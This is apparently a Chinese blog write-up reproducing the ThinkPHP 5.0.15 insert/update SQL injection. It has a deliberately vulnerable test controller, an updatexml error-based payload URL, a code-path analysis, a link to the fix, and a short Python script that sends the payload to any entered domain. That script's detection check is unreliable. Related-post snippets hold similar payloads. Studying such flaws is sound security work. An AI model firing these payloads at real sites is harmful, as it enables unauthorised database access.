一次复现审计ThinkPHP5.0.15版本的sql注入

最新推荐文章于 2024-08-11 19:27:09 发布
最新推荐文章于 2024-08-11 19:27:09 发布
阅读量326 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: php mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/112977079
版权

关于tp框架

ThinkPHP 是一个免费开源的,快速、简单的面向对象的 轻量级PHP开发框架
,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领先和最具影响力的WEB应用开发框架,众多的典型案例确保可以稳定用于商业以及门户级的开发。

漏洞描述

尽管ThinkPHP 5.0.x框架采用了参数化查询方式,来操作数据库,但是在 insert 和 update方法中,传入的参数可控,且无严格过滤,最终导致本次SQL注入漏洞发生。

前期准备

下载地址:http://www.thinkphp.cn/down/1125.html

解压放在小皮中,访问页面
在这里插入图片描述
按照大佬的文章,这里我们要新建个数据库—表---字段
在这里插入图片描述
然后打开C:\phpstudy_pro\WWW\thinkphp_5.0.15\application按照自己前面编写的来填空在这里插入图片描述
修改config.php
在这里插入图片描述
修改database.php在这里插入图片描述
application/index/controller/Index.php的Index类中添加方法:

public  function testsql()

    {

        $username = input('get.username/a');

        db('user')->where(['id'=> 1])->insert(['username'=>$username]);

    }

然后拿着大佬写的payload访问触发

http://127.0.0.1/thinkphp_5.0.15/public/index.php/index/index/testsql?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1

在这里插入图片描述
大佬给的解释

http://127.0.0.1/thinkphp/  public/        index.php/   index/   index/   index
         域名     网站目录  对外访问目录        入口文件     前台      控制器    方法名
       
扩展:
其中关于 updatexml 函数UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据

作用:改变文档中符合条件的节点的值

漏洞分析

首先,我们知道 insert 方法存在漏洞,那就查看 insert 方法的具体实现。
通过input获取到参数后,username变量情况如下:

username = {array}[3]
	0 = "inc"
	1 = "updatexml(1,concat(0x7,user(),0x7e),1)"
	2 = "1"

跟入insert,thinkphp/library/think/db/Query.php在这里插入图片描述
执行insert语句

$sql = $this->builder->insert($data, $options, $replace);

跟入 thinkphp/library/think/db/Builder.php
在这里插入图片描述
跟入parseData至 thinkphp/library/think/db/Builder.php
在这里插入图片描述
可以看出$val是数组,且根据$val[0]值为inc,会通过switch语句进入到’inc’:
此处的parseKey,即thinkphp/library/think/db/builder/Mysql.php
在这里插入图片描述
此处并未对传入的$key进行更多的过滤与检查,将其与前面经过parseKey的结果进行拼接后返回给result至此注入成功。

漏洞修补

https://github.com/top-think/framework/commit/363fd4d90312f2cfa427535b7ea01a097ca8db1b

大佬文章地址:https://blog.csdn.net/Candyys/article/details/104864761

自己写的垃圾poc

import requests
import re
#分割线___________________________________

def domain1(domain):
    url1 = domain + "/index.php/index/index/testsql?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1"
    try:
        res = requests.get(url1)
        res.encoding = 'utf-8'
        html = res.text

        html_data = re.findall("456",html)
        html_data1 = []
        for i in html_data:
            if not i in html_data1:
                html_data1.append(i)
        print("(温馨提示为null可能是不存在该漏洞):" + str(html_data1))
    except Exception:
        print("请检查网址是否正确")
def main():
    domain = input("请输入域名或IP:")
    domain1(domain)
if __name__ == '__main__':
    main()
p_utao
关注
专栏目录
[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露
qq_51577576的博客
09-29 1741
[ vulhub漏洞复现篇 ] Thinkphp SQL注入 && 敏感信息泄露 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。 Thinkphp5X设计缺陷导致泄漏数据库账户密码
ThinkPHP_3.1.3 SQL注入漏洞复现
weixin_44611282的博客
05-22 8857
首先在网上下载对应的压缩包。 漏洞位于ThinkPHP/Lib/Core/Model.class.php 文件的parseSql函数 将这一条修复语句注释后开始一步步复现ThinkPHP目录下创建app文件夹后创建index.php 访问相应页面,显示这个则说明成功。 成功后app文件夹下会生成工程文件 然后开始配置数据库(在app/conf/config.php下配置) <?php return array( //'配置项'=>'配置值' // 添加数据库配置信息 'DB_TYPE
ThinkPHP5.0.15_parseData造成SQL注入漏洞分析
11-28 1216
ThinkPHP5.0.15_parseData造成SQL注入漏洞分析 ThinkPHP5.0.13-ThinkPHP5.0.15/ThinkPHP5.1.0-ThinkPHP5.1.5 漏洞代码<?php namespace app\index\controller; class Index{ public function index(){ $username = request()->get('username\a'); db('users')-
Thinkphp5.0.15 SQL注入
feng的博客
03-05 1839
前言 刚把tp5的RCE给审的差不多了,审的很爽,接下来审一下thinkphp5各个版本SQL注入。 代码不用说了,composer先下载下来。 composer create-project topthink/think=5.0.15 thinkphp5.0.15 下载来的%99都是版本不对,改一下composer.json 然后composer update就可以了。 index控制器那里写一下insert语句: class Index { public function index()
ThinkPHP5.0.15漏洞解析及SQL注入
最新发布
m0_70638961的博客
08-11 403
通过查看5.0.155.0.16版本的对比,可以看到16版本对在Builder.php里面对数据库的增减做了修正,所以可以15版本漏洞就存在在这里。这里的代码用的拼接的方式,就可以尝试使用报错注入来实现。到了这里就发现,我们注入的三个值在这里派上了用场,val[1]就是注入的报错语句,这里走完,返回的就是报错注入语句+1,接下来我们继续走,一直走到这里。为了清楚代码是怎么走的,我们可以在insert()打一个断点,重新提交后就可以进入断点了,这里我们可以看到username有三个值。
ThinkPHP v5.0.15 完整版
02-06
软件介绍 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,经历了三年多发展的同时,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和 改进,众多的典型案例确保可以稳定用于商业以及门户级的开发。 ThinkPHP借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,采用单一入口模式等,融合了Struts的 Action思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式,封装了CURD和一些常用操作,在项目配置、类 库导入、模版引擎、查询语言、自动验证、视图模型、项目编译、缓存机制、SEO支持、分布式数据库、多数据库连接和切换、认证机制和扩展性方面均有独特的 表现。 使用ThinkPHP,你可以更方便和快捷的开发和部署应用。当然不仅仅是企业级应用,任何PHP应用开发都可以从ThinkPHP的简单 和快速的特性中受益。ThinkPHP本身具有很多的原创特性,并且倡导大道至简,开发由我的开发理念,用最少的代码完成更多的功能,宗旨就是让WEB应 用开发更简单、更快速。为此ThinkPHP会不断吸收和融入更好的技术以保证其新鲜和活力,提供WEB应用开发的最佳实践! ThinkPHP遵循Apache2开源许可协议发布,意味着你可以免费使用ThinkPHP,甚至允许把你基于ThinkPHP开发的应用开源或商业产 品发布/销售。 ThinkPHP v5.0.15 更新日志: 改进View类 改进chunk方法 改进模板引擎的表达式语法 改进自关联查询多级调用问题 关联定义增加`selfRelation`方法用于设置是否自关联 改进file类型的缓存`inc`和`dec`方法不改变缓存有效期 改进软删除 支持设置`deleteTime`属性关闭 改进`union`查询 改进查询缓存 优化File缓存自动生成空目录的问题 改进日志写入并发问题 修正`MorphTo`关联 改进`join`自关联查询 改进`case`标签解析 改进Url类对`url_convert`配置的支持
13-PHP代码审计——ThinkPHP5.0.15聚合查询漏洞分析
网络安全
05-06 624
漏洞环境: ThinkPHP5.0.15 <= 漏洞影响版本 poc: id),(select sleep(5)),(username id),(updatexml(1,concat(0x7,database(),0x7e),1) 什么是聚合查询? mysql数据库中有一张users表用于存储用户信息,假如我们想要查询users表中有多少个用户的记录,可以直接执行select * from users sql语句来获取用户的个数记录,但是这样做的效率非常低,因为我们只想..
对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
10-25
但即使是成熟的框架也可能存在安全漏洞,例如文件ThinkPHP/Lib/Core/Model.class.php中的SQL注入漏洞就是一个例子,它发生在ThinkPHP3.1.3及更早的版本中。 SQL注入是一种常见的网络攻击手段,攻击者通过在数据库...
tp5防止sql注入mysql_【漏洞分析】ThinkPHP 5.0版本 SQL注入漏洞分析
weixin_34954140的博客
01-30 1023
阅读:6,774前段时间,ThinkPHP发布了V5.0.16版本的release,该版本提到了安全更新。本篇文章以此次安全更新入手,对ThinkPHP 5.0版本 SQL注入漏洞进行了详细分析。文末还有测试小问题,看看大家get到这个漏洞的精髓了吗?前言Thinkphp V5.0.16版本的release说明如下:说明中提到了安全更新,但并没有提到是什么安全问题。V5.0.16的commits记...
ThinkPHP5.0.15代码审计SQL注入
D.MIND 的博客
05-04 591
文章目录环境搭建分析payload:修复 环境搭建 到composer.json填写版本 到application/index/controller/Index.php中配置: public function index()//控制方法 { $username = request()->get('username/a'); db('users')->insert(['username'=>$username]); return 'Update success'; }
12-PHP代码审计——ThinkPHP5.0.15 update注入分析
网络安全
05-06 847
环境: thinkphp_5.0.15_full poc: level[0]=inc&level[1]=updatexml(1,concat(0x7,user(),0x7e),1)&level[2]=1 下载ThinkPHP5.0.15解压到www.tptest.com目录下,并在phpstudy中将域名站点的网站目录改为ThinkPHP5.0.15的public目录。 在application目录的config.php文件中开启跟踪调试模式,如下所示: // 应.
thinkphp mysql exp_ThinkPHP框架 5.0.x sql注入漏洞分析
weixin_31635881的博客
02-11 378
作者:chybeta来源:先知安全社区前言漏洞复现搭建好数据库,以我自己的配置为例。数据库为tptest,表名为user,其中有两个字段id和usernamethinkphp官网下载5.0.15版本: http://www.thinkphp.cn/down/1125.html 。修改数据库配置信息 application/database.php。在 application/config.php ...
Thinkphp 5.0.15 设计缺陷导致Insert/update-SQL注入 分析
weixin_30532973的博客
07-31 485
分析 与上一个漏洞类似,这个也是前端可以传入一个数组变量,如['exp','123','123'],后端根据array[0]来将array[1]和array[2]直接拼接到SQL语句中。 由于TP只是框架,为了保证应用业务正常运行,不能为主应用做过多的安全防御(如转义、去除危险字符等)。 上一个漏洞点存在于处理where语句的parseWhere()处,而这个点则在处理insert和s...
[复现]Thinkphp5系列漏洞
kuuhh的博客
08-05 7116
SQL注入 parseData方法 本次漏洞存在于 Builder 类的 parseData 方法中。由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生。漏洞影响版本5.0.13<=ThinkPHP<=5.0.15 、 5.1.0<=ThinkPHP<=5.1.5 。 测试代码,我这里用的版本ThinkPHP 5.0.15 public function index() { update / insert 方法
thinkphp 5 用Query对象执行 增删改查
ycs_0405的专栏
08-23 710
$Model = new \think\db\Query(); //执行查询 //查询订单号对应的货品product_id $sql = "SELECT * FROM jshop_order_items WHERE order_id='".$order_id."' ORDER BY id DESC limit 1"; $list = $Model->query($sql); $product_id = $list[0]["product_...
ThinkPHP5代码审计【聚合函数引起的SQL注入
D.MIND 的博客
05-09 346
文章目录简介环境搭建分析payload修复 简介 Mysql 聚合函数相关方法均存在注入 本次漏洞存在于所有 Mysql 聚合函数相关方法。由于程序没有对数据进行很好的过滤,直接将数据拼接进 SQL 语句,最终导致 SQL注入漏洞 的产生。 漏洞影响版本5.0.0<=ThinkPHP<=5.0.21 、 5.1.3<=ThinkPHP5<=5.1.25 。 Payload IN :5.0.0~5.0.21 、 5.1.3~5.1.10 id)%2bupdatexml(1,co
ThinkPHP5.0.x框架SQL注入
热门推荐
An丶的博客
06-05 1万+
漏洞简述尽管ThinkPHP 5.0.x框架采用了参数化查询方式,来操作数据库,但是在 insert 和 update 方法中,传入的参数可控,且无严格过滤,最终导致本次SQL注入漏洞发生。ThinkPHP基础知识在进行漏洞分析之前,我们需要了解一下ThinkPHP基础知识,这里仅介绍对本次漏洞分析有帮助的部分。ThinkPHP5.0的 目录结构thinkphp 应用部署目录├─applicati...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值